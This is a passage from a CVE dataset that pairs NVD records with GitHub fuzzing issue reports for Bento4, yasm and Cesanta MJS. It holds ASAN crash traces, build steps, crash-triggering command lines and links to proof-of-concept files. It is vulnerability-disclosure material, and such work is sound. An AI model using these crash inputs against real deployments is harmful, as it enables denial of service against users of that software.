#3 0x6063ae in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:150:9
#4 0x605ca2 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16
#5 0x53af9d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20
#6 0x539fa1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#7 0x57804b in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#8 0x57729e in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
#9 0x57729e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
#10 0x53b79c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
#11 0x539fa1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#12 0x57804b in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#13 0x57729e in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
#14 0x57729e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
#15 0x53b79c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
#16 0x539fa1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#17 0x5397cb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
#18 0x4cfebe in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4File.cpp:104:12
#19 0x4d03ca in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4File.cpp:78:5
#20 0x4c7064 in main /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Apps/Mp42Avc/Mp42Avc.cpp:307:32
#21 0x7f877ffc1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
==1349287==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd) in operator new(unsigned long)
==1349287==ABORTING
```
# poc
https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp42avc/poc3.zip
| out-of-memory in mp42avc | https://api.github.com/repos/axiomatic-systems/Bento4/issues/841/comments | 1 | 2023-03-14T02:40:15Z | 2024-02-17T17:49:29Z | https://github.com/axiomatic-systems/Bento4/issues/841 | 1,622,623,759 | 841 |
CVE-2023-29580 | 2023-04-12T13:15:07.727 | yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the component yasm_expr_create at /libyasm/expr.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/215"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/segv/yasm_expr_create/readmd.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yasm/yasm/issues/215 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared && make -j && make install
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/segv/yasm_expr_create/id:000051%2Csig:06%2Csrc:008025%2Cop:havoc%2Crep:32
## ASAN Info
```c
./yasm id:000051,sig:06,src:008025,op:havoc,rep:32
yasm: file name already has no extension: output will be in `yasm.out'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3310123==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000060db46 bp 0x7ffd285ed390 sp 0x7ffd285ed320 T0)
==3310123==The signal is caused by a READ memory access.
==3310123==Hint: address points to the zero page.
#0 0x60db46 in yasm_expr_create /home/z1r0/fuzzing/yasm/yasm/libyasm/expr.c:87:44
#1 0x57c34f in nasm_parser_directive /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1597:17
#2 0x579361 in parse_line /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:377:17
#3 0x579361 in nasm_parser_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:231:18
#4 0x577618 in nasm_do_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:66:5
#5 0x577618 in nasm_parser_do_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:83:5
#6 0x4c6eae in do_assemble /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:521:5
#7 0x4c6eae in main /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:753:12
#8 0x7f764ee43082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#9 0x41c47d in _start (/home/z1r0/fuzzing/yasm/yasm/yasm+0x41c47d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/z1r0/fuzzing/yasm/yasm/libyasm/expr.c:87:44 in yasm_expr_create
==3310123==ABORTING
```
| SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create | https://api.github.com/repos/yasm/yasm/issues/215/comments | 1 | 2023-03-31T07:56:32Z | 2024-03-21T12:41:09Z | https://github.com/yasm/yasm/issues/215 | 1,648,868,122 | 215 |
CVE-2023-29571 | 2023-04-12T15:15:13.233 | Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_sweep at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/241"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_gc/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/cesanta/mjs/issues/241 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # SEGV src/mjs_gc.c:190:11 in gc_sweep
## project address
https://github.com/cesanta/mjs
## info
OS:Ubuntu20.04 TLS
Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)`
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_gc/poc6.zip
## ASAN Info
```c
./mjs poc6.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2926144==ERROR: AddressSanitizer: SEGV on unknown address 0x7fff89960675 (pc 0x0000004e2647 bp 0x7fffffffe030 sp 0x7fffffffdb98 T0)
==2926144==The signal is caused by a READ memory access.
#0 0x4e2647 in gc_sweep /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_gc.c:190:11
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_gc.c:190:11 in gc_sweep
==2926144==ABORTING
```
| SEGV src/mjs_gc.c:190:11 in gc_sweep | https://api.github.com/repos/cesanta/mjs/issues/241/comments | 0 | 2023-03-06T01:35:33Z | 2023-03-06T01:35:33Z | https://github.com/cesanta/mjs/issues/241 | 1,610,494,409 | 241 |
CVE-2023-29581 | 2023-04-12T16:15:19.603 | yasm 1.3.0.55.g101bc has a segmentation violation in the function delete_Token at modules/preprocs/nasm/nasm-pp.c. NOTE: although a libyasm application could become unavailable if this were exploited, the vendor's position is that there is no security relevance because there is either supposed to be input validation before data reaches libyasm, or a sandbox in which the application runs. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": null,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2186333"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://github.com/yasm/yasm/blob/master/SECURITY.md"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/216"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/segv/delete_Token/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yasm/yasm/issues/216 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # SEGV yasm/modules/preprocs/nasm/nasm-pp.c in delete_Token
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared && make -j && make install
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/segv/delete_Token/id:000176%2Csig:06%2Csrc:008442%2B007750%2Cop:splice%2Crep:128
## ASAN Info
```c
./yasm id:000176,sig:06,src:008442+007750,op:splice,rep:128
yasm: file name already has no extension: output will be in `yasm.out'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3784849==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005994b7 bp 0x7ffd44e1e310 sp 0x7ffd44e1de80 T0)
==3784849==The signal is caused by a READ memory access.
==3784849==Hint: address points to the zero page.
#0 0x5994b7 in delete_Token /home/z1r0/fuzzing/yasm/yasm/modules/preprocs/nasm/nasm-pp.c
#1 0x5994b7 in expand_macros_in_string /home/z1r0/fuzzing/yasm/yasm/modules/preprocs/nasm/nasm-pp.c:2317:16
#2 0x5994b7 in do_directive /home/z1r0/fuzzing/yasm/yasm/modules/preprocs/nasm/nasm-pp.c:2873:17
#3 0x58994f in pp_getline /home/z1r0/fuzzing/yasm/yasm/modules/preprocs/nasm/nasm-pp.c:5083:13
#4 0x58291c in nasm_preproc_get_line /home/z1r0/fuzzing/yasm/yasm/modules/preprocs/nasm/nasm-preproc.c:198:12
#5 0x578570 in nasm_parser_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:219:13
#6 0x577618 in nasm_do_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:66:5
#7 0x577618 in nasm_parser_do_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:83:5
#8 0x4c6eae in do_assemble /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:521:5
#9 0x4c6eae in main /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:753:12
#10 0x7f150c316082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x41c47d in _start (/home/z1r0/fuzzing/yasm/yasm/yasm+0x41c47d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/z1r0/fuzzing/yasm/yasm/modules/preprocs/nasm/nasm-pp.c in delete_Token
==3784849==ABORTING
```
## Reference
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/segv/delete_Token/readme.md
| SEGV yasm/modules/preprocs/nasm/nasm-pp.c in delete_Token | https://api.github.com/repos/yasm/yasm/issues/216/comments | 13 | 2023-03-31T08:02:18Z | 2024-03-22T12:02:52Z | https://github.com/yasm/yasm/issues/216 | 1,648,877,295 | 216 |
CVE-2023-29573 | 2023-04-13T20:15:16.690 | Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp4info component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/840"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp4info/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/840 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found out-of-memory bug in mp4info
# BUG
out-of-memory (/home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/cmakebuild/mp4info+0x4c44ed) in operator new(unsigned long)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=address -g"
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release ..
make
```
```
./mp4info poc2.mp4
File:
major brand: mp42
minor version: 1
compatible brand: isom
compatible brand: mp42
compatible brand: dash
fast start: yes
Movie:
duration: 0 (movie timescale units)
duration: 0 (ms)
time scale: 600
fragments: yes
Found 2 Tracks
Track 1:
flags: 15 ENABLED IN-MOVIE IN-PREVIEW
id: 1
type: Video
duration: 0 ms
language: eng
media:
sample count: 0
timescale: 25
duration: 0 (media timescale units)
duration: 0 (ms)
=================================================================
==318973==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x800000010 bytes
#0 0x4c44ed in operator new(unsigned long) (/home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/cmakebuild/mp4info+0x4c44ed)
#1 0x5c311e in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4Array.h:172:25
#2 0x5c311e in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4Array.h:210:25
#3 0x5c311e in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:150:9
#4 0x5c2a12 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16
#5 0x4fa6fd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20
#6 0x4f9701 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#7 0x50befb in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#8 0x50b14e in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
#9 0x50b14e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
#10 0x4faefc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
#11 0x4f9701 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#12 0x50befb in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#13 0x50b14e in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
#14 0x50b14e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
#15 0x4faefc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
#16 0x4f9701 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#17 0x4f8f2b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
#18 0x53df79 in AP4_LinearReader::AdvanceFragment() /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4LinearReader.cpp:350:31
#19 0x53ec11 in AP4_LinearReader::Advance(bool) /home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/Source/C++/Core/Ap4LinearReader.cpp:443:33
#20 0x6060000002bf (<unknown module>)
==318973==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (/home/ubuntu/fuzz/Bento4_fuzz/asan/Bento4/cmakebuild/mp4info+0x4c44ed) in operator new(unsigned long)
==318973==ABORTING
```
# poc
https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp4info/poc2.zip
| out-of-memory in mp4info | https://api.github.com/repos/axiomatic-systems/Bento4/issues/840/comments | 0 | 2023-03-14T02:26:20Z | 2024-02-17T17:08:01Z | https://github.com/axiomatic-systems/Bento4/issues/840 | 1,622,614,615 | 840 |
CVE-2023-29569 | 2023-04-14T12:15:07.770 | Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via ffi_cb_impl_wpwwwww at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/239"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_ffi/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/cesanta/mjs/issues/239 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | # SEGV src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww
## project address
https://github.com/cesanta/mjs
## info
OS:Ubuntu20.04 TLS
Build: `$(DOCKER_CLANG) -fsanitize=address $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)`
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/mjs/SEGV/mjs_ffi/poc4.zip
## ASAN Info
```c
./mjs poc4.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==255247==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004dfe3e (pc 0x0000004dfeb6 bp 0x7fffffffe070 sp 0x7fffffffdbd0 T0)
==255247==The signal is caused by a WRITE memory access.
#0 0x4dfeb6 in ffi_cb_impl_wpwwwww /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_ffi.c:456
#1 0x4d81f1 in mjs_exec_internal /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_exec.c:1073:5
#2 0x4d88e3 in mjs_exec_file /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_exec.c:1096:11
#3 0x4e8435 in main /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_main.c:47:11
#4 0x7ffff7c4f082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41c42d in _start (/home/ubuntu/asan_fuzz_mjs/mjs/build/mjs+0x41c42d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/asan_fuzz_mjs/mjs/src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww
==255247==ABORTING
```
| SEGV src/mjs_ffi.c:456 in ffi_cb_impl_wpwwwww | https://api.github.com/repos/cesanta/mjs/issues/239/comments | 0 | 2023-03-06T01:14:12Z | 2023-03-06T01:14:12Z | https://github.com/cesanta/mjs/issues/239 | 1,610,480,695 | 239 |
CVE-2023-29575 | 2023-04-21T14:15:07.373 | Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42aac component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory",
"Vendor Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/842"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp42aac/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
